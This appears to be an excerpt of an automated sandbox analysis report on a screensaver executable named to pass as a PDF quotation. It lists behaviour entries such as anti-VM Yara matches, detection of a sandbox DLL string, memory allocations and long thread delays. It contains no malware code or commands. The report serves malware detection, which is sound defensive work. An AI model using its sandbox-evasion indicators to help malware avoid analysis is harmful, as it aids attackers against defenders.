Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: QUOTATION_JANQUOTE312025#U00faPDF.scr PID: 1852, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2570021211.0000000003081000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Memory allocated: 1570000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Memory allocated: 3080000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Memory allocated: 5080000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Memory allocated: 1640000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Memory allocated: 3170000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Memory allocated: 2F80000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 598584	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 597750	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 597638	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 597282	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 597157	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 596907	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 596797	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 596556	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 596204	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 595946	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 595842	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 595624	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 595391	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 595266	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 595157	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 595032	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Window / User API: threadDelayed 7773			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Window / User API: threadDelayed 2017			Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 2472	Thread sleep count: 7773 > 30	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 2472	Thread sleep count: 2017 > 30	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -99696s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -99578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -99469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -99344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -99234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -99125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -99016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -98906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -98797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -98687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -98575s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -98468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -98328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -98219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -598750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -598584s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -598468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -598344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -598219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -598110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -597985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -597860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -597750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -597638s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -597531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -597422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -597282s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -597157s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -597047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -596907s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -596797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -596672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -596556s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -596453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -596344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -596204s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -596094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -595946s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -595842s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -595735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -595624s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -595516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -595391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -595266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -595157s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr TID: 3504	Thread sleep time: -595032s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 99696	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 99578	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 99469	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 99344	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 99234	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 99125	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 99016	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 98906	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 98797	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 98687	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 98575	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 98468	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 98328	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 98219	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 598584	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 597750	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 597638	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 597282	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 597157	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 596907	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 596797	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 596556	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Thread delayed: delay time: 596204	Jump to behavior
